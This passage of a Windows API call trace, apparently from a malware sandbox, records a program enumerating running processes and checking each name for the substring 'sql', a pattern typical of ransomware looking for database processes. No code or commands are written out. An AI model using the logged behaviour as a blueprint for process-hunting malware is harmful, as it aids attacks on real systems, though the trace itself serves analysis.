th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0165.063] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0165.063] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35847d8 [0165.063] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35847d8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0165.064] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0165.064] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0165.064] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0165.066] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0165.066] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35847c0 [0165.066] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35847c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0165.066] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0165.066] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0165.066] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0165.067] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0165.067] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3584790 [0165.068] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3584790, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0165.068] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0165.068] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0165.068] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0165.069] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0165.069] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35844f0 [0165.069] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x35844f0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 12 [0165.069] lstrcpyA (in: lpString1=0x567fabc, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0165.069] StrStrIA (lpFirst="spoolsv.exe", lpSrch="sql") returned 0x0 [0165.069] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0165.070] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0165.071] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3584718 [0165.071] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3584718, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0165.071] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0165.071] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0165.071] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x554, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0165.072] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0165.072] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3584538 [0165.072] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x3584538, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 12 [0165.072] lstrcpyA (in: lpString1=0x567fabc, lpString2="audiodg.exe" | out: lpString1="audiodg.exe") returned="audiodg.exe" [0165.072] StrStrIA (lpFirst="audiodg.exe", lpSrch="sql") returned 0x0 [0165.072] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x708, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0165.074] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0165.074] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3584730 [0165.074] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x3584730, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 11 [0165.074] lstrcpyA (in: lpString1=0x567fabc, lpString2="sihost.exe" | out: lpString1="sihost.exe") returned="sihost.exe" [0165.074] StrStrIA (lpFirst="sihost.exe", lpSrch="sql") returned 0x0 [0165.074] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0165.076] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0165.076] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3584748 [0165.076] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3584748, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0165.076] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0165.076] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0165.076] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0165.078] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0165.078] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3584550 [0165.078] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x3584550, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0165.078] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0165.078] StrStrIA (lpFirst="taskhostw.exe", lpSrch="sql") returned 0x0 [0165.078] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x41, th32ParentProcessID=0x568, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0165.080] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0165.080] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3584568 [0165.080] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x3584568, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 13 [0165.080] lstrcpyA (in: lpString1=0x567fabc, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0165.080] StrStrIA (lpFirst="explorer.exe", lpSrch="sql") returned 0x0 [0165.080] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0165.081] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0165.081] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3596f48 [0165.081] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x3596f48, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 21 [0165.081] lstrcpyA (in: lpString1=0x567fabc, lpString2="OfficeClickToRun.exe" | out: lpString1="OfficeClickToRun.exe") returned="OfficeClickToRun.exe" [0165.081] StrStrIA (lpFirst="OfficeClickToRun.exe", lpSrch="sql") returned 0x0 [0165.081] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0165.083] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0165.083] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x3585df0 [0165.083] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x3585df0, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SecurityHealthService.exe", lpUsedDefaultChar=0x0) returned 26 [0165.083] lstrcpyA (in: lpString1=0x567fabc, lpString2="SecurityHealthService.exe" | out: lpString1="SecurityHealthService.exe") returned="SecurityHealthService.exe" [0165.083] StrStrIA (lpFirst="SecurityHealthService.exe", lpSrch="sql") returned 0x0 [0165.083] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0165.084] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0165.084] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3596f08 [0165.084] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x3596f08, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Memory Compression", lpUsedDefaultChar=0x0) returned 19 [0165.084] lstrcpyA (in: lpString1=0x567fabc, lpString2="Memory Compression" | out: lpString1="Memory Compression") returned="Memory Compression" [0165.084] StrStrIA (lpFirst="Memory Compression", lpSrch="sql") returned 0x0 [0165.084] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0165.086] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0165.086] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x3596f88 [0165.086] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x3596f88, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 24 [0165.086] lstrcpyA (in: lpString1=0x567fabc, lpString2="ShellExperienceHost.exe" | out: lpString1="ShellExperienceHost.exe") returned="ShellExperienceHost.exe" [0165.086] StrStrIA (lpFirst="ShellExperienceHost.exe", lpSrch="sql") returned 0x0 [0165.086] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0165.088] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0165.088] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3584580 [0165.088] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x3584580, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 13 [0165.088] lstrcpyA (in: lpString1=0x567fabc, lpString2="SearchUI.exe" | out: lpString1="SearchUI.exe") returned="SearchUI.exe" [0165.088] StrStrIA (lpFirst="SearchUI.exe", lpSrch="sql") returned 0x0 [0165.088] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0165.090] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0165.090] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x3596f68 [0165.090] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x3596f68, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 18 [0165.090] lstrcpyA (in: lpString1=0x567fabc, lpString2="RuntimeBroker.exe" | out: lpString1="RuntimeBroker.exe") returned="RuntimeBroker.exe" [0165.090] StrStrIA (lpFirst="RuntimeBroker.exe", lpSrch="sql") returned 0x0 [0165.090] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0165.091] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0165.091] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3584598 [0165.091] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x3584598, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0165.091] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0165.091] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="sql") returned 0x0 [0165.091] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pending.exe")) returned 1 [0165.093] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0165.093] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35849e8 [0165.093] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x35849e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pending.exe", lpUsedDefaultChar=0x0) returned 12 [0165.093] lstrcpyA (in: lpString1=0x567fabc, lpString2="pending.exe" | out: lpString1="pending.exe") returned="pending.exe" [0165.093] StrStrIA (lpFirst="pending.exe", lpSrch="sql") returned 0x0 [0165.094] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="appointmentimpressed.exe")) returned 1 [0165.095] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0165.095] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x3585f30 [0165.095] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x3585f30, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="appointmentimpressed.exe", lpUsedDefaultChar=0x0) returned 25 [0165.095] lstrcpyA (in: lpString1=0x567fabc, lpString2="appointmentimpressed.exe" | out: lpString1="appointmentimpressed.exe") returned="appointmentimpressed.exe" [0165.095] StrStrIA (lpFirst="appointmentimpressed.exe", lpSrch="sql") returned 0x0 [0165.095] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="swing prefer.exe")) returned 1 [0165.309] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0165.309] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3597208 [0165.309] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x3597208, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="swing prefer.exe", lpUsedDefaultChar=0x0) returned 17 [0165.309] lstrcpyA (in: lpString1=0x567fabc, lpString2="swing prefer.exe" | out: lpString1="swing prefer.exe") returned="swing prefer.exe" [0165.309] StrStrIA (lpFirst="swing prefer.exe", lpSrch="sql") returned 0x0 [0165.309] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="vietnamese_mature_hat.exe")) returned 1 [0165.311] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0165.311] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x3585d28 [0165.311] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x3585d28, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vietnamese_mature_hat.exe", lpUsedDefaultChar=0x0) returned 26 [0165.311] lstrcpyA (in: lpString1=0x567fabc, lpString2="vietnamese_mature_hat.exe" | out: lpString1="vietnamese_mature_hat.exe") returned="vietnamese_mature_hat.exe" [0165.312] StrStrIA (lpFirst="vietnamese_mature_hat.exe", lpSrch="sql") returned 0x0 [0165.312] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="nights-attending.exe")) returned 1 [0165.314] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0165.314] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3596fc8 [0165.314] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x3596fc8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nights-attending.exe", lpUsedDefaultChar=0x0) returned 21 [0165.314] lstrcpyA (in: lpString1=0x567fabc, lpString2="nights-attending.exe" | out: lpString1="nights-attending.exe") returned="nights-attending.exe" [0165.314] StrStrIA (lpFirst="nights-attending.exe", lpSrch="sql") returned 0x0 [0165.314] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="installed.exe")) returned 1 [0165.315] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0165.315] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3584400 [0165.315] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x3584400, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="installed.exe", lpUsedDefaultChar=0x0) returned 14 [0165.316] lstrcpyA (in: lpString1=0x567fabc, lpString2="installed.exe" | out: lpString1="installed.exe") returned="installed.exe" [0165.316] StrStrIA 